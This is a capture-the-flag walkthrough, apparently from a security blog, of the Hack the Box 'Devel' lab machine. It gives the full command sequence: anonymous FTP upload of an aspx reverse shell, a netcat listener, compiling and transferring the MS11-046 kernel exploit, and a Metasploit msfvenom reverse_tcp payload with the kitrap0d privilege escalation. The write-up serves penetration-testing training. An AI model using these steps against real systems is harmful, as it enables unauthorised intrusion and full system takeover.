Subscribe to Blog via Email

Categories

Archives

CTF Challenges

Hack the Box Challenge: Devel Walkthrough

We are going to play with the DEVEL machine of Hack the box. Here we will learn how to pwn the machine and access the privilege shell. Our perspective to exploit the machine by the manual method to follow the OSCP level also. Devel –Hack the box lab is an online machine and has the static IP 10.129.226.65.

Task: Capture the user.txt and root.txt flag

Penetration Testing Methodologies

Manual Method (OSCP)

Network Scanning

  • Nmap

Enumeration

  • Writable FTP

Exploitation

  • aspx shell upload
  • Capture user.txt file

Privilege Escalation

  • Kernel Privilege escalation
  • Administrator Privileges

Automate Method (Metasploit)

Manual Method

Network Scanning

The first thing to do is Nmap scanning to identify the open ports and services for which we will aggressively run the scan.

nmap –A 10.129.226.65

Through the enumeration, we get to know that only two ports are open i.e. port 80 –HTTP with Microsoft IIS web server and port 21 –FTP show that anonymous login is allowed.

So now our only avenue of attack is through port 80 and port 21.

In the first look, we navigate to port 80 in the browser only home page is appearing.

http://10.129.226.65

Enumeration

Let’s move toward the port FTP.

As FTP Anonymous login vulnerability is appeared in the Nmap Scan, by using that, we are going to log in FTP, Username: Anonymous, and Password: Anonymous.

ftp 10.129.226.65

Okay, we’re in! Current directory has three files.

We know that IIS 7 generally either executes ASPX (ASP.NET) or ASP.

So, we are likely to Google the aspx reverse shell.

An attacker (kali) machine, download the reverse shell aspx file uing the below command:

wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx

Open the shell.aspx file and edit the IP address (I.e. Kali’s IP Address ) or can change port also (optional).

Exploitation

Back to the FTP, OPPS!! The connection gets close. So again login to the FTP and upload the reverse shell aspx as shown in the below image,

put shell.aspx

Shell.aspx file has been uploaded on the FTP server.

To run the malicious script (shell. aspx) execute the following url in the web browser and simultaneously start a netcat listener on the attack machine to receive the reverse shell when it’s executed.

Boooom!!! We will get the netcat session. Do the post enumeration to fetch the flag file. But unfortunately, access is denied on babis and the administrator directory.

So, let’s move forward to check the system info focus on OS Name and Version i.e. Microsoft Windows7 N/A Build 7600, so probably vulnerable to a bunch of exploits.

Let’s google to check the Microsoft Windows 7 exploits

Privilege Escalation

The kernel exploit (MS11-046) allows us to escalate privileges. So we will go with this exploit.

On the attack (Kali) machine, Searchsploit EDB id 40564 to know the concern exploits.

Ohh nice!! We get the Local Priviliege escalation to exploit and its C file by default copied to the current directory.

Now time to compile the exploit, for compilation,mingw-64 must be installed. If we don’t have then we can install it from the below command:

apt install mingw-64

Start the compilation by using the below command and output file name as shell.exe

i686-w64-mingw32-gcc 40564.c -o shell.exe -lws2_32

After compilation, our next motto is to just transfer the executable file into the victim’s machine. There are multiple methods to transfer the file, our favorite one is SMB file transfer.

We start the impacket smbserver utility and the smb share folder will configure under the name “share”.Follow the below command

impacket-smbserver share $(pwd) -smb2support

As the Public directory has accessible permission so we copy the shell.exe into it. Now the file is the Users/Public Directory.

Well done!! Finally, we execute the shell.exe and as soon as it executes, the exploit will work and escalate the privileges.

“NTauthority/System “We Have system!!!

Now enumerate the babis and administrator directories to capture the user.txt flag.

We already had a netcat session at the attacker’s machine (kali),here also we can execute the shell.exe file.

Automate Method (Metasploit)

Let’s use msfvenom to generate the reverse shell. Below is the command to generate the aspx payload.

msfvenom –p windows/meterpreter/reverse_tcp lhost=10.10.14.123 lport=4444 –f aspx > revshell.aspx

Already we have discussed in the manual method, regarding the FTP vulnerability of anonymous login. By using the same we log in to the FTP and upload the rev shell.aspx onto the web server’s root directory.

put revshell.aspx

After file transfer, we navigate the aspx file in the browser.

10.129.226.65/revshell.aspx

On the other hand, we are starting msfconsole, selecting multi handler module with reverse shell payload, and running the exploit.

msfconsole –q
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.123
set lport 4444
exploit

We get the meterpreter session 1.

As we know web server IIS7 version 6.1.700 is old and exploitable so we search the exploit according and get the ms10_015_kitrap0d exploit module. Now, selecting this module and setting on session 1 we run the exploit.

use exploit/windows/local/ms10_015_kitrap0d
set lhost 10.10.14..123
set lport 8888
set session 1
exploit

Great!!! We have a meterpreter session again and through getuid, we get to know that we have a system-level shell. Now get the user’s flag as captured in the manual method above.

Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here